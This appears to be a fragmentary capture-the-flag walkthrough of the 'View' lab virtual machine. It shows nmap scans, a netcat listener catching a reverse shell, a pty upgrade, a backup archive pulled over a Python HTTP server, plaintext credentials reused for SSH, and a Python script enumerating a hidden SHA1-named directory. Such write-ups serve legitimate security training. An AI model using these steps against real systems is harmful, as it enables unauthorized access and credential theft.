root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.112
Host is up (0.00024s latency).
MAC Address: 08:00:27:B0:44:15 (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -sV -Pn -v 192.168.56.112
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8191/tcp open  http    PHP cli server 5.5 or later

root@kali:~# nmap -sC -v -A -Pn -p 22,25,80,8191 -sV 192.168.56.112
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 54:8e:3a:14:b2:be:03:5c:d4:08:3a:ed:bb:e1:55:53 (RSA)
|   256 aa:be:cb:e1:b6:7f:47:75:29:f7:63:e5:f9:39:78:2e (ECDSA)
|_  256 de:1c:31:e0:15:4d:f5:dc:8e:bc:3c:e4:7d:64:75:54 (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: rain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=rain
| Subject Alternative Name: DNS:rain
| Issuer: commonName=rain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-07-22T22:11:20
| Not valid after:  2029-07-19T22:11:20
| MD5:   04a9 b97a 8bf2 dc6b 02f2 382b 075b 2e51
|_SHA-1: a4e5 f2f5 efbf 5a3a 215a 9c96 6f9d 10f4 a94e 85bb
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
| http-robots.txt: 4 disallowed entries
|_/joomla /zorin /dev /defense
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A View To A Kill
8191/tcp open  http    PHP cli server 5.5 or later
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: electronic controller app
Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee!
note_to_mail_admins.txt:
Yo, wassup computer geeks! I was told by design to upload a few example emails for you nerds to work with in prep for what they called "email web gooey platform".
onboarding_email_template.rtf:
Greeting EMPLOYEE, We welcome you to the team! Please login to our HR mgmt portaland fill out your profile and Details. Login username: USERNAME@localhost.com and password is: PASSWORD. INSERT ORG SPECIFIC PHRASE, glad you joined the team EMPLOYEE!
Stop_Storing_Passwords.rtf:
All, I know you're close with Max, but you can't keep storing your credentials in txt files on your desktop! We already have had complaints of the apps inactivity auto logout feature, but 5 seconds is high enough in my professional opinion. Simply copy pasting credentials in the login fields is bad practice, even if password requirments are set to 32 characters minimun! - Scarpine - Head of Security - CSO CIO
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.112: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 55570
Linux view 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 19:12:10 up  1:23,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@view:/$
A zip archive was found in the /home/jenny directory; download it and see what it contains.

www-data@view:/home/jenny$ ls
ls
dsktp_backup.zip
www-data@view:/home/jenny$ python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
passswords.txt:
hr mgmt - NO ACCESS ANYMORE
jenny@localhost.com
ThisisAreallYLONGPAssw0rdWHY!!!!
root@kali:~# ssh jenny@192.168.56.112
Enter passphrase for key '/root/.ssh/id_rsa':
jenny@192.168.56.112's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-66-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 23 19:58:43 UTC 2020

  System load:  0.0               Processes:           206
  Usage of /:   65.0% of 11.75GB  Users logged in:     0
  Memory usage: 50%               IP address for enp0s17: 192.168.56.112
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

181 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan 23 19:42:33 2020 from 192.168.56.102
jenny@view:~$ id
uid=1007(jenny) gid=1007(jenny) groups=1007(jenny)
jenny@view:~$ whoami
jenny
todo.txt:
TODO
-Give feedback to marketing on logo (it currently looks like the banner ouside a cheap Italian reseaurant!!)
-The Boss likes the original, so I guess we're keeping it :/
-Push final script to /home/max/aView.py
-Waiting on devs and mechanical eng. to finalize programs (no way for QA to test this one! Yikes!)
-Verify James Bond is MI6. They may be on to us.
-Security says they are trying to infltrate our servers, so they pushed out a new password policy.
-Head of Security said this policy will solve all security related problems after I confronted him about it.
-Make a habit of deleting pointless emails.
-Migrate needed desktop items to Linux server.
Change into max's home directory.

www-data@view:/home$ cd max
cd max
www-data@view:/home/max$ ls
ls
aView.py  note.txt
www-data@view:/home/max$ cat note.txt
cat note.txt
Max,
The electronic controller web application you asked for is almost done. Located on port 8191 this app will allow you to execute your plan from a remote location.
The remote trigger is located in a hidden web directory that only you should know - I verbally confirmed it with you. If you do not recall, the directory is based on an algorithm: SHA1(lowercase alpha(a-z) + "view" + digit(0-9) + digit(0-9)).
from hashlib import sha1

# Enumerate every candidate directory name of the form <a-z>view<0-9><0-9>
# described in the note (26 * 10 * 10 = 2600 candidates) and hash each one.
prefixes = [bytes([c]) for c in range(ord('a'), ord('z') + 1)]
xs = range(10)
ys = range(10)
suffixes = [bytes(f'{x}{y}', 'ascii') for x in xs for y in ys]
# The trailing newline is kept as in the original snippet; it makes each
# digest equal to what `echo <name> | sha1sum` (without -n) would produce.
names = [prefix + b'view' + suffix + b'\n' for prefix in prefixes for suffix in suffixes]
hashes = [sha1(n).hexdigest() for n in names]